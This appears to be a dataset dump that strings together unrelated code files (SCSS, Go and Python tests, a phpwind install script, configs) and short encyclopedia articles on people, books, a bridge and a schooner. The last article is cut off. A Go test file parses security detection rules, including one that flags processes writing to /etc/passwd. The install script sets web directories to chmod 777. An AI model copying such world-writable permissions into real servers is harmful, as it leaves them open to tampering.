text
stringlengths
1
22.8M
```scss @import '../../../../../../common'; .pipeline { display: flex; flex-direction: column; align-content: stretch; height: 100%; .paddingContent { padding-left: 20px; padding-right: 20px; } ul { list-style: none; li.stage { width: 10%; float: left; position: relative; .stageItem { width: 60%; margin-left: auto; margin-right: auto; ul { list-style: none; padding: 0px; position: relative; li { margin-bottom: 10px; margin-top: 10px; padding-top: 5px; padding-bottom: 5px; position: relative; :host-context(.night) & { color: $darkTheme_grey_6; .success.nzSegment { background-color: $darkTheme_night_green; } .fail.nzSegment { background-color: $darkTheme_night_red; } .inactive.nzSegment { background-color: $darkTheme_night_grey; } .building.nzSegment { background-color: $darkTheme_night_blue; } } .success.nzSegment { background-color: $cds_color_light_green; } .fail.nzSegment { background-color: $cds_color_light_red; } .inactive.nzSegment { background-color: $cds_color_light_grey; } .building.nzSegment { background-color: $cds_color_light_teal; } .newspaper .icon { float: right; } } li:first-child::before { width: 50%; left: -50%; } li:first-child::after { width: 50%; right: -50%; } li::before { content: ''; top: -42px; border-bottom: 4px solid $cds_color_teal; border-left: 4px solid $cds_color_teal; position: absolute; width: 40px; left: -40px; height: calc(100% + 14px); } li::after { content: ''; top: -42px; border-bottom: 4px solid $cds_color_teal; border-right: 4px solid $cds_color_teal; position: absolute; width: 40px; right: -40px; height: calc(100% + 14px); } } .job.nzSegment { height: 51px; padding: 0; border: 2px solid transparent; .title { padding: 5px; height: 100%; display: flex; flex-direction: row; align-items: center; .ellipsis { flex: 1; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; } } .duration { position: absolute; right: 4px; bottom: 4px; color: gray; font-size: 0.8rem; font-weight: 600; } .warningPip { position: absolute; right: 4px; top: 4px; font-size: 1rem; } } .job.nzSegment.active { border: 2px solid $cds_color_teal; } } } li.one.stage { width: 100%; } li.two.stage { width: 50%; } li.three.stage { width: 33%; } li.four.stage { width: 25%; } li.five.stage { width: 20% } li.six.stage { width: 16%; } li.seven.stage { width: 14%; } } ul { li.stage:first-child { .stageItem { ul { li::before { border: 0 none } } } } li.stage { .stageItem { ul { li:first-child::after { border-right: 0 none; } li:first-child::before { border-left: 0 none; } } } } li.stage:last-child { .stageItem { ul { li::after { border: 0 none } } } } } } .orange { color: $cds_color_orange; } ```
```objective-c ///|/ ///|/ PrusaSlicer is released under the terms of the AGPLv3 or higher ///|/ #import <Cocoa/Cocoa.h> @interface RemovableDriveManagerMM : NSObject -(instancetype) init; -(void) add_unmount_observer; -(void) on_device_unmount: (NSNotification*) notification; -(NSArray*) list_dev; -(void)eject_drive:(NSString *)path; @end ```
```shell #!/bin/bash #phpwind if [ ! -f phpwind_GBK_8.7.zip ];then wget path_to_url fi rm -rf phpwind_GBK_8.7 unzip phpwind_GBK_8.7.zip mv phpwind_GBK_8.7/upload/* /alidata/www/phpwind/ chmod -R 777 /alidata/www/phpwind/attachment chmod -R 777 /alidata/www/phpwind/data chmod -R 777 /alidata/www/phpwind/html cd /alidata/www/phpwind/ find ./ -type f | xargs chmod 644 find ./ -type d | xargs chmod 755 chmod -R 777 attachment/ html/ data/ cd - #phpmyadmin if [ ! -f phpmyadmin.zip ];then wget path_to_url fi rm -rf phpMyAdmin-4.1.8-all-languages unzip phpMyAdmin-4.1.8-all-languages.zip mv phpMyAdmin-4.1.8-all-languages /alidata/www/phpwind/phpmyadmin chown -R www:www /alidata/www/phpwind/ ```
```python # # # path_to_url # # Unless required by applicable law or agreed to in writing, software # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # GET_ITER (new) # FOR_ITER (new) from __future__ import annotations import os os.environ['MIN_GRAPH_SIZE'] = '-1' import operator import unittest from test_case_base import ( TestCaseBase, test_instruction_translator_cache_context, ) import paddle from paddle.jit.sot.opcode_translator.executor.dispatcher import ( Dispatcher, Parameter, Pattern, ) from paddle.jit.sot.opcode_translator.executor.tracker import ( BinaryOperatorTracker, ) from paddle.jit.sot.opcode_translator.executor.variables import ConstantVariable def register_dispatch(fn, parameters, handler): """ Registering function signature. Args: fn: The function to be registered. parameters: The parameters of the function to be registered. handler: The handler function. """ _parameters = tuple( ( Parameter.from_str(parameter) if isinstance(parameter, str) else parameter ) for parameter in parameters ) if fn not in Dispatcher.handlers: Dispatcher.handlers[fn] = [] Dispatcher.handlers[fn].insert(0, (Pattern(*_parameters), handler)) def operator_gt_dis_func(left, right): return ConstantVariable( operator.gt(left.get_py_value(), right.get_py_value()), graph=left.graph, tracker=BinaryOperatorTracker("COMPARE_OP", [left, right], 4), ) def operator_add_dis_func(left, right): return ConstantVariable( operator.gt(left.get_py_value(), right.get_py_value()), graph=left.graph, tracker=BinaryOperatorTracker("BINARY_ADD", [left, right]), ) class TestBinaryOperatorTracker(TestCaseBase): def test_case_compare_op(self): def func(x, y): if x > 0: return y + 1 return y + 2 register_dispatch( operator.gt, ("ConstantVariable", "ConstantVariable"), operator_gt_dis_func, ) y = paddle.randn((2, 2)) with test_instruction_translator_cache_context() as ctx: self.assert_results(func, 12, y) self.assertEqual(ctx.translate_count, 1) self.assert_results(func, 10, y) self.assertEqual(ctx.translate_count, 1) self.assert_results(func, -12, y) self.assertEqual(ctx.translate_count, 2) def test_case_compare_op_2(self): def func(x, y): if x + 2 > 0: return y + 1 return y + 2 register_dispatch( operator.gt, ("ConstantVariable", "ConstantVariable"), operator_gt_dis_func, ) register_dispatch( operator.add, ("ConstantVariable", "ConstantVariable"), operator_add_dis_func, ) y = paddle.randn((2, 2)) with test_instruction_translator_cache_context() as ctx: self.assert_results(func, 12, y) self.assertEqual(ctx.translate_count, 1) self.assert_results(func, 10, y) self.assertEqual(ctx.translate_count, 1) self.assert_results(func, -12, y) self.assertEqual(ctx.translate_count, 2) if __name__ == "__main__": unittest.main() ```
```yaml # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # # path_to_url # # Unless required by applicable law or agreed to in writing, # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # specific language governing permissions and limitations # # Expose the Grafana container on the host on port 3000 --- services: grafana: ports: - "3000:443" ```
Terry English is a British armourer, mainly designing and making arms and armour, as well as props, for film and television productions. His work is held in museums such as the UK's Royal Armouries, and in private collections. Early life and career English was born in the East End of London, and moved to Romford, Essex, when he was five. His father was a tailor and suit cutter. English began his career in 1962, employed by theatrical costumers L & H Nathans of Drury Lane, Covent Garden, London, working on props and metal parts of costumes. Many of the costumes that were hired out came back damaged, and under the tutelage of professionally-trained swordmaker Arthur West, English learned to repair them, and later to make new armour costumes and metal props. In the early 70s he set up his own company making theatrical armour and arms, including animal armour, such as for horses. The first film he made armour for through his own company was Mary, Queen of Scots (1971). The armour worn by Lancelot in the 1981 film Excalibur is on display at the Royal Armouries in London, as is a copy he made of one of Henry VIII's suits of armour. In the 1980s English also made armour for the Education Department at the Royal Armouries. English appeared in the 'making of' documentaries, The Making of Excalibur: Myth into Movie (1981), directed by Neil Jordan, and Behind the Sword in the Stone (2013). He had cameo roles in some of the movies for which he provided armour. English works out of his workshop at his home near Hayle in Cornwall. When working on a movie, English will pack up his workshop and ship it to the filming location, so that he can undertake on-site costume making, fitting and repairs. In 2014 an episode of the television show Shed and Buried with Henry Cole was devoted to English and his collection of vintage vehicles as well as his film memorabilia. In June 2017 Adam Savage spent eight days with English at his workshop in Cornwall, making a recreation of King Arthur's armour suit from Excalibur. This was filmed and released in the Tested.com series as Adam Savage's Armor Build in October 2017. English is listed by the UK's Heritage Crafts Association as one of the few craftspeople currently practising the art of armour- and helmet-making. A 2019 profile in Country Life described English as 'widely acknowledged as the best armourer in the world'. Museum displays and exhibitions The Lancelot suit from Excalibur is held in the collections of the Royal Armouries at the Royal Armouries Museum. A life-size armour suit for an Indian elephant, designed and made by English, is displayed at Stratford Armouries. A large collection of armour by English was featured in the 2010 exhibition '75 Years of Twentieth Century Fox' at the London Film Museum. The 2016 exhibition 'Way of the Warrior: Epic Movies and Armour' at Forge Mill Needle Museum featured a full suit of armour designed and made by English for Sir Galahad in King Arthur. The 2016 exhibition 'All Monsters Great and Small' at the Royal Cornwall Museum featured English's work. Selected films with armour and/or props designed and made by English 1965 Doctor Zhivago 1966 Fahrenheit 451 1968 The Lion in Winter 1968 The Charge of the Light Brigade 1971 Mary, Queen of Scots 1977 Jabberwocky 1981 Excalibur 1984 Sword of the Valiant 1986 Aliens 1986 Highlander 1988 High Spirits 1992 Alien 3 1995 First Knight 1997 Batman & Robin 1998 The Man in the Iron Mask 1999 The Messenger: The Story of Joan of Arc 1999 The 13th Warrior 2000 Gladiator 2001 A.I. Artificial Intelligence 2001-2011 Harry Potter films 2004 King Arthur 2005 Kingdom of Heaven 2010 Clash of the Titans 2010 Robin Hood 2011 Sucker Punch 2013 Thor: The Dark World 2017 Transformers: The Last Knight References External links Adam Savage meets Terry English and learns about designing and making armour, and about English's career: seven-part video series from 2017 English's website Armourers Living people People from Essex British costume designers Year of birth missing (living people)
The Dream Coach is a children's book by Anne Parrish. It contains four fairytale-like stories linked by the theme of a Dream Coach which travels around the world bringing dreams to children. The stories are: "The Seven White Dreams of the King's Daughter", "Goran's Dream", "A Bird Cage With Tassels of Purple and Pearls (Three Dreams of a Little Chinese Emperor)", and ""King" Philippe's Dream". The book, illustrated by Dillwyn Parrish, the author's brother, was first published in 1924 and was a Newbery Honor recipient in 1925. A public domain online edition of The Dream Coach, a 1925 Newbery Honor Book, is available at A Celebration of Women Writers. References External links 1924 children's books 1924 short story collections American children's books Children's short story collections Newbery Honor-winning works Children's books about dreams
Ger O'Keeffe (born 1952 in Tralee, County Kerry) is an Irish former Gaelic footballer who played for Austin Stack's and at senior level for the Kerry county team between 1973 and 1982. He is currently a selector with the Kerry senior football team. Playing career Schools O'Keeffe was part of the St Brendan's College, Killarney side that won the Munster Colleges Corn Uí Mhuirí and Hogan Cup in 1969. Underage In 1970 O'Keeffe was part of the Kerry minor team that won the Munster Minor Football Championship after beating Cork in the final. Kerry later qualified for the All-Ireland Minor Football Championship, where they lost out to Galway after a replay. Senior O'Keeffe was Kerry captain in 1977 when Kerry lost to Dublin. He was a member of the Kerry four-in-a-row All-Ireland SFC team from 1978 to 1981. Selector O'Keeffe was a selector of the senior Kerry team from 2004 to 2006 and again from 2009 until the present. He was also a selector with Jack O'Connor for the Kerry U21 team in 2002 and 2008. He won an All-Ireland Under 21 medal in 1973 and won an All-Ireland Club SFC title with Austin Stacks in 1977. References 1952 births Living people All Stars Awards winners (football) Austin Stacks Gaelic footballers Austin Stacks hurlers Dual players Gaelic football backs Gaelic football selectors Kerry inter-county Gaelic footballers Munster inter-provincial Gaelic footballers Winners of three All-Ireland medals (Gaelic football)
Belling the Cat () is a 2014 Vietnamese animated film, directed by Lê Bình. The plot is based on the Aesop's fable Belling the cat. Award Silver Kite prize – Vietnam Film Festival XIX (2015) References Vietnamese animated films Vietnamese computer-animated films Films based on fairy tales 2014 animated films 2014 films Animated films about cats
```go // Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT. //go:build go1.16 && integration // +build go1.16,integration package snowball_test import ( "context" "testing" "time" "github.com/aws/aws-sdk-go/aws" "github.com/aws/aws-sdk-go/aws/awserr" "github.com/aws/aws-sdk-go/aws/request" "github.com/aws/aws-sdk-go/awstesting/integration" "github.com/aws/aws-sdk-go/service/snowball" ) var _ aws.Config var _ awserr.Error var _ request.Request func TestInteg_00_DescribeAddresses(t *testing.T) { ctx, cancelFn := context.WithTimeout(context.Background(), 5*time.Second) defer cancelFn() sess := integration.SessionWithDefaultRegion("us-west-2") svc := snowball.New(sess) params := &snowball.DescribeAddressesInput{} _, err := svc.DescribeAddressesWithContext(ctx, params, func(r *request.Request) { r.Handlers.Validate.RemoveByName("core.ValidateParametersHandler") }) if err != nil { t.Errorf("expect no error, got %v", err) } } ```
```php @extends('voyager::master') @section('css') <style> .user-email { font-size: .85rem; margin-bottom: 1.5em; } </style> @stop @section('content') <div style="background-size:cover; background-image: url({{ Voyager::image( Voyager::setting('admin.bg_image'), voyager_asset('/images/bg.jpg')) }}); background-position: center center;position:absolute; top:0; left:0; width:100%; height:300px;"></div> <div style="height:160px; display:block; width:100%"></div> <div style="position:relative; z-index:9; text-align:center;"> <img src="@if( !filter_var(Auth::user()->avatar, FILTER_VALIDATE_URL)){{ Voyager::image( Auth::user()->avatar ) }}@else{{ Auth::user()->avatar }}@endif" class="avatar" style="border-radius:50%; width:150px; height:150px; border:5px solid #fff;" alt="{{ Auth::user()->name }} avatar"> <h4>{{ ucwords(Auth::user()->name) }}</h4> <div class="user-email text-muted">{{ ucwords(Auth::user()->email) }}</div> <p>{{ Auth::user()->bio }}</p> @if ($route != '') <a href="{{ $route }}" class="btn btn-primary">{{ __('voyager::profile.edit') }}</a> @endif </div> @stop ```
```java package no.agens.depth.lib.tween.interpolators; import android.animation.TimeInterpolator; /** * Created by danielzeller on 09.04.15. */ public class SineIn implements TimeInterpolator { @Override public float getInterpolation(float t) { return (float) -Math.cos(t * (Math.PI/2)) + 1; } } ```
The Enfield–Suffield Veterans Bridge, commonly known in either town as the Enfield Bridge or Suffield Bridge, is the main traffic crossing that connects the towns of Enfield and Suffield, Connecticut over the Connecticut River. It carries Route 190 as well as the Windsor Locks Canal State Park Trail across the river. See also List of crossings of the Connecticut River External links and references Bridges over the Connecticut River Enfield, Connecticut Suffield, Connecticut Bridges completed in 1966 Bridges in Hartford County, Connecticut Road bridges in Connecticut Box girder bridges in the United States Steel bridges in the United States
```go // Unless explicitly stated otherwise all files in this repository are licensed // This product includes software developed at Datadog (path_to_url // Package ast holds ast related files package ast import ( "encoding/json" "testing" ) func parseRule(rule string) (*Rule, error) { pc := NewParsingContext() return pc.ParseRule(rule) } func parseMacro(macro string) (*Macro, error) { pc := NewParsingContext() return pc.ParseMacro(macro) } func printJSON(t *testing.T, i interface{}) { b, err := json.MarshalIndent(i, "", " ") if err != nil { t.Error(err) } t.Log(string(b)) } func TestEmptyRule(t *testing.T) { _, err := parseRule(``) if err == nil { t.Error("Empty expression should not be valid") } } func TestCompareNumbers(t *testing.T) { rule, err := parseRule(`-3 > 1`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestCompareSimpleIdent(t *testing.T) { rule, err := parseRule(`process > 1`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestCompareCompositeIdent(t *testing.T) { rule, err := parseRule(`process.pid > 1`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestCompareString(t *testing.T) { rule, err := parseRule(`process.name == "/usr/bin/ls"`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestCompareComplex(t *testing.T) { rule, err := parseRule(`process.name != "/usr/bin/vipw" && open.pathname == "/etc/passwd" && (open.mode == O_TRUNC || open.mode == O_CREAT || open.mode == O_WRONLY)`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestRegister(t *testing.T) { rule, err := parseRule(`process.ancestors[A].filename == "/usr/bin/vipw" && process.ancestors[A].pid == 44`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestIntAnd(t *testing.T) { rule, err := parseRule(`3 & 3`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestBoolAnd(t *testing.T) { rule, err := parseRule(`true and true`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestInArrayString(t *testing.T) { rule, err := parseRule(`"a" in [ "a", "b", "c" ]`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestInArrayInteger(t *testing.T) { rule, err := parseRule(`1 in [ 1, 2, 3 ]`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestMacroList(t *testing.T) { macro, err := parseMacro(`[ 1, 2, 3 ]`) if err != nil { t.Error(err) } printJSON(t, macro) } func TestMacroPrimary(t *testing.T) { macro, err := parseMacro(`true`) if err != nil { t.Error(err) } printJSON(t, macro) } func TestMacroExpression(t *testing.T) { macro, err := parseMacro(`1 in [ 1, 2, 3 ]`) if err != nil { t.Error(err) } printJSON(t, macro) } func TestMultiline(t *testing.T) { expr := `process.filename == "/usr/bin/vipw" && process.pid == 44` if _, err := parseRule(expr); err != nil { t.Error(err) } expr = `process.filename in ["/usr/bin/vipw", "/usr/bin/test"]` if _, err := parseRule(expr); err != nil { t.Error(err) } expr = `process.filename == "/usr/bin/vipw" && ( process.filename == "/usr/bin/test" || # blah blah # blah blah process.filename == "/ust/bin/false" )` if _, err := parseRule(expr); err != nil { t.Error(err) } } func TestPattern(t *testing.T) { rule, err := parseRule(`process.name == ~"/usr/bin/ls"`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestArrayPattern(t *testing.T) { rule, err := parseRule(`process.name in [~"/usr/bin/ls", "/usr/sbin/ls"]`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestRegexp(t *testing.T) { rule, err := parseRule(`process.name == r"/usr/bin/ls"`) if err != nil { t.Error(err) } printJSON(t, rule) rule, err = parseRule(`process.name == r"^((?:[A-Za-z\d+]{4})*(?:[A-Za-z\d+]{3}=|[A-Za-z\d+]{2}==)\.)*(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z1-9])$" `) if err != nil { t.Error(err) } printJSON(t, rule) } func TestArrayRegexp(t *testing.T) { rule, err := parseRule(`process.name in [r"/usr/bin/ls", "/usr/sbin/ls"]`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestDuration(t *testing.T) { rule, err := parseRule(`process.start > 10s`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestNumberVariable(t *testing.T) { rule, err := parseRule(`process.pid == ${pid}`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestIPv4(t *testing.T) { rule, err := parseRule(`network.source.ip == 127.0.0.1`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestIPv4Raw(t *testing.T) { rule, err := parseRule(`127.0.0.2 == 127.0.0.1`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestIPv6Localhost(t *testing.T) { rule, err := parseRule(`network.source.ip == ::1`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestIPv6(t *testing.T) { rule, err := parseRule(`network.source.ip == 2001:0000:0eab:DEAD:0000:00A0:ABCD:004E`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestIPv6Short(t *testing.T) { rule, err := parseRule(`network.source.ip == 2001:0:0eab:dead::a0:abcd:4e`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestIPArray(t *testing.T) { rule, err := parseRule(`network.source.ip in [ ::1, 2001:0:0eab:dead::a0:abcd:4e, 127.0.0.1 ]`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestIPv4CIDR(t *testing.T) { rule, err := parseRule(`network.source.ip in 192.168.0.0/24`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestIPv6CIDR(t *testing.T) { rule, err := parseRule(`network.source.ip in ::1/128`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestCIDRArray(t *testing.T) { rule, err := parseRule(`network.source.ip in [ ::1/128, 2001:0:0eab:dead::a0:abcd:4e/24, 127.0.0.1/32 ]`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestIPAndCIDRArray(t *testing.T) { rule, err := parseRule(`network.source.ip in [ ::1, 2001:0:0eab:dead::a0:abcd:4e, 127.0.0.1, ::1/128, 2001:0:0eab:dead::a0:abcd:4e/24, 127.0.0.1/32 ]`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestCIDRMatches(t *testing.T) { rule, err := parseRule(`network.source.cidr allin 192.168.0.0/24`) if err != nil { t.Error(err) } printJSON(t, rule) } func TestCIDRArrayMatches(t *testing.T) { rule, err := parseRule(`network.source.cidr allin [ 192.168.0.0/24, ::1/128 ]`) if err != nil { t.Error(err) } printJSON(t, rule) } ```
William Sydney Fisher (born 1958) is an American investor, hedge fund manager, and philanthropist. He has been a director of Gap Inc. since 2009, and the founder and chief executive officer of Manzanita Capital Limited. The son of Gap Inc. founders Donald Fisher and Doris F. Fisher, William Fisher has been involved with the company as a board member or employee for nearly 30 years. As of January 2018, Fisher has a net worth of US$1.85 billion. Early life and education Fisher was born to a Jewish family, is the son of Doris Feigenbaum Fisher and Don Fisher, the co-founders of Gap, Inc. He has two brothers: Robert J. Fisher and John J. Fisher. Fisher attended Phillips Exeter Academy. He is a 1979 graduate of Princeton University, where he received a bachelor's degree and a 1984 graduate of the Stanford University Graduate School of Business, from which he earned a master's degree in Business Administration. Investment career Fisher began his career at The Gap after earning his MBA, starting first as the store director for the Banana Republic and then the general manager for Gap in Canada. Fisher served as the president of the Gap's international division and is credited with expanding the company into Canada, France, Germany, the United Kingdom, and Japan. In 2001, he founded the London-based private equity firm Manzanita Capital and serves as its CEO. Manzanita concentrates its investments in branded luxury companies in Europe, consumer goods, and retail. In 2009, he was appointed to the Gap's board of directors. Political views In 2019, it was revealed that Fisher, together with his mother Doris F. Fisher, as well as brothers Robert J. Fisher and John J. Fisher, had donated nearly $9 million to a dark money group which opposed Barack Obama in the 2012 election. Personal life Fisher is married to Sakurako Fisher, and the couple has three children. His wife, who graduated from Stanford with a B.A. in 1982, was born in Japan to an American father and a Japanese mother and serves as president of the San Francisco Symphony Orchestra and chair of the Smithsonian National Board. Wealth and philanthropy According to Forbes Magazine, he has a net worth of $1.85 billion USD. Fisher donates heavily to his alma mater Stanford and has a professorship there. In 2011, he donated $1 million to Stanford's Freeman Spogli Institute for International Studies. He serves as vice chairman of the science museum Exploratorium in San Francisco. Like many other members of the Fisher family, he supports pro-charter school candidates in a variety of races. In September 2022, Fisher donated $980,000 to the "No on 30" California ballot campaign. References 1958 births American billionaires American financiers American investors American retail chief executives Businesspeople from the San Francisco Bay Area American philanthropists Living people Phillips Exeter Academy alumni Princeton University alumni Private equity and venture capital investors Stanford Graduate School of Business alumni Fisher family Gap Inc. people 21st-century American Jews
```sourcepawn /*############################################################################ # # # path_to_url # # Unless required by applicable law or agreed to in writing, software # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ############################################################################*/ /*! * \file * \brief Test data. * * Type : Intel(R) EPID 1.1 Signature * Group : grpX * Signer : member0 * HashAlg : Sha256 * Message : "test message" * Basename: "basename2" * SigRl : group x sigrl */ //unsigned char sig_sha256_bsn1_msg0_dat[] = { 0x67, 0x58, 0xb2, 0x9c, 0xad, 0x61, 0x1f, 0xfb, 0x74, 0x23, 0xea, 0x40, 0xe9, 0x66, 0x26, 0xb0, 0x43, 0xdc, 0x7e, 0xc7, 0x48, 0x88, 0x56, 0x59, 0xf3, 0x35, 0x9f, 0xdb, 0xfa, 0xa2, 0x49, 0x51, 0x85, 0x35, 0x42, 0x50, 0x8e, 0x79, 0x79, 0xc0, 0x6c, 0xcc, 0x39, 0x0b, 0xad, 0x3b, 0x39, 0x33, 0xae, 0xb2, 0xa1, 0xc5, 0x28, 0x6f, 0x48, 0x3a, 0xd2, 0x63, 0x5d, 0xfb, 0x1b, 0x1f, 0x8a, 0x63, 0x84, 0xdc, 0x2d, 0xad, 0x3b, 0x98, 0x3f, 0xc3, 0x8e, 0x18, 0xd7, 0xea, 0x18, 0x50, 0x0c, 0x50, 0x42, 0x77, 0xb2, 0x59, 0xf5, 0xd5, 0x38, 0xc3, 0x8d, 0x57, 0xf4, 0xe7, 0xb8, 0x74, 0x5a, 0x9e, 0x32, 0x75, 0xd1, 0xb4, 0xb3, 0x64, 0xbc, 0x23, 0xcd, 0x98, 0x29, 0x7a, 0x77, 0x51, 0xfc, 0x26, 0x81, 0x41, 0x9b, 0xf6, 0x21, 0xad, 0xc1, 0xd9, 0xab, 0x30, 0x25, 0x8d, 0x0c, 0x3b, 0x62, 0xe2, 0x05, 0xe1, 0x05, 0xdd, 0x55, 0x7e, 0xf6, 0x7a, 0x66, 0xf9, 0x64, 0x67, 0x2b, 0x57, 0x0b, 0xd1, 0x83, 0x12, 0xfa, 0x67, 0x4d, 0x29, 0x3e, 0x86, 0x91, 0xbb, 0x4c, 0x9a, 0x50, 0xf4, 0xba, 0xab, 0x02, 0x46, 0x36, 0x83, 0x12, 0x54, 0xf6, 0x5e, 0xcb, 0xd7, 0xcd, 0x8c, 0x47, 0x72, 0x43, 0xf4, 0x5f, 0x8b, 0x9f, 0xa6, 0x31, 0x38, 0x8c, 0x52, 0xde, 0x16, 0x0f, 0xe5, 0xea, 0x3b, 0x51, 0x18, 0x06, 0xda, 0xec, 0x18, 0x94, 0xdc, 0xb2, 0x32, 0xc8, 0x0f, 0xfd, 0x43, 0x15, 0x9c, 0x91, 0xb2, 0xf4, 0x90, 0xb6, 0x9c, 0xb8, 0xcd, 0x49, 0xfc, 0x27, 0xff, 0x68, 0x33, 0xc3, 0x06, 0xb9, 0x05, 0x04, 0x9b, 0x71, 0x83, 0x6b, 0xf0, 0x95, 0x31, 0x16, 0x70, 0x30, 0xc9, 0x4b, 0xcd, 0x63, 0x85, 0xc6, 0xf4, 0x3f, 0xe9, 0x35, 0x19, 0x02, 0x61, 0x91, 0x52, 0xda, 0x47, 0xcf, 0x40, 0xed, 0x40, 0xda, 0x8d, 0xe3, 0xbb, 0x31, 0xee, 0xf6, 0x3e, 0x83, 0x6a, 0x20, 0xc0, 0x38, 0xc6, 0xb1, 0x5d, 0x78, 0xff, 0x2b, 0x5e, 0x90, 0x53, 0x04, 0xb0, 0x25, 0x49, 0x04, 0xb4, 0x38, 0x1f, 0x56, 0xfe, 0x15, 0x23, 0x7d, 0xbc, 0x31, 0xc6, 0x38, 0x71, 0xe5, 0xa3, 0x00, 0x00, 0x0b, 0x8c, 0x01, 0xef, 0x56, 0x72, 0x20, 0x1d, 0x30, 0x95, 0x62, 0x3c, 0x37, 0x91, 0x32, 0x94, 0xf3, 0xa4, 0x73, 0x68, 0x6c, 0xda, 0x11, 0x7f, 0x3e, 0x33, 0xa2, 0x35, 0xcb, 0x7c, 0x00, 0x00, 0x43, 0xb9, 0x97, 0x4e, 0x4b, 0xcc, 0x01, 0x30, 0xea, 0xba, 0xcf, 0x5a, 0x4a, 0x4c, 0x35, 0xdc, 0x2a, 0xfa, 0x3a, 0xa7, 0x8b, 0x07, 0x50, 0x1b, 0x28, 0x83, 0x5f, 0x12, 0xd5, 0x3f, 0x00, 0x93, 0x24, 0x59, 0x9b, 0x1c, 0x46, 0xd6, 0x1b, 0x85, 0x23, 0x4d, 0x05, 0xf2, 0x14, 0x00, 0x31, 0xe0, 0x53, 0x85, 0x0b, 0x0a, 0xa5, 0x75, 0x6d, 0x74, 0x65, 0x87, 0x12, 0xa5, 0x2f, 0x98, 0x23, 0x2f, 0x93, 0x21, 0x24, 0x93, 0x1e, 0x4e, 0x51, 0x0e, 0x7a, 0x46, 0x01, 0x0b, 0x9b, 0xc8, 0xc7, 0xb0, 0xd0, 0x5d, 0x6a, 0x54, 0xc5, 0x76, 0xf3, 0xdb, 0x40, 0xe1, 0x9e, 0xd0, 0x33, 0x32, 0xd5, 0x13, 0x57, 0xf9, 0x74, 0x20, 0x86, 0x6b, 0xa8, 0xfb, 0xb9, 0x00, 0x00, 0x17, 0xb0, 0xa5, 0x95, 0x02, 0x3c, 0x4e, 0x02, 0x73, 0x38, 0xc7, 0xbb, 0x5f, 0xef, 0x48, 0x70, 0xde, 0xf4, 0xa4, 0x45, 0x4c, 0x7d, 0x9c, 0x19, 0xc8, 0x98, 0x56, 0x13, 0xe3, 0x31, 0x00, 0x00, 0x6b, 0xdb, 0xe4, 0x38, 0x71, 0xdc, 0x95, 0xf0, 0x40, 0xb1, 0xc8, 0xcd, 0x88, 0xe2, 0x75, 0xc1, 0xeb, 0x7f, 0xb0, 0x6f, 0x9a, 0x46, 0xca, 0x1a, 0xb3, 0xf3, 0xc9, 0xe4, 0x56, 0xaa, 0x00, 0x00, 0x6b, 0x89, 0xf7, 0xd9, 0x55, 0x3c, 0x9f, 0xd6, 0xf6, 0x71, 0x0e, 0xc3, 0xe8, 0xbf, 0xe1, 0x3a, 0x91, 0x1d, 0xe8, 0x8d, 0x9d, 0x1d, 0x20, 0x08, 0x4e, 0x2e, 0x04, 0x9c, 0xd0, 0x06, 0x00, 0x00, 0x23, 0x5c, 0x31, 0x9b, 0x46, 0x4a, 0xff, 0x19, 0x16, 0x89, 0x06, 0x35, 0x58, 0xdf, 0xf4, 0x2d, 0x17, 0x04, 0x21, 0x28, 0x80, 0x66, 0x2c, 0x48, 0xb6, 0x4f, 0xee, 0xd0, 0xe5, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 //}; //unsigned int sig_sha256_bsn1_msg0_dat_len = 577; ```
The American Eagle, originally Andrew and Rosalie, is a two-masted schooner serving the tourist trade out of Rockland, Maine. Launched in 1930 at Gloucester, Massachusetts, she was the last auxiliary schooner (powered by both sail and engine) to be built in that port, and one of Gloucester's last sail-powered fishing vessels. A National Historic Landmark, she is also the oldest known surviving vessel of the type, which was supplanted not long afterward by modern trawlers. History Andrew and Rosalie was built in 1930 by the United Sail Loft Company in Gloucester, for Patrick Murphy, a local fishing master, and was named for his children. The ship was used in fishing operations by his family until 1941, when it was sold to the Empire Fish Company, who renamed her American Eagle. They converted her for use as a trawler, a role she served, mainly under the ownership of the Piscitello brothers, until 1983. She was purchased in 1984 by John Foss, who had recently restored the Lewis R. French (also a National Historic Landmark), and was restored at the North End Shipyard at Rockland, Maine. Foss rebuilt her for the cruise ship trade, and she now spends summers cruising Penobscot Bay in Maine on 3-7 day cruises, though she generally takes one longer cruise per year to places like Grand Manan Island in Canada. She is one of the few schooners in Maine that go on longer cruises, and one of the few that go offshore looking for whales. She also generally returns to Gloucester every year. American Eagle was listed on the National Register of Historic Places in 1991, and was declared a National Historic Landmark in 1992. She is the sole surviving representative of the transitional period between traditional sail-powered fishing vessels and more modern trawlers, having been built about the same time as the Gertrude L. Thebaud, 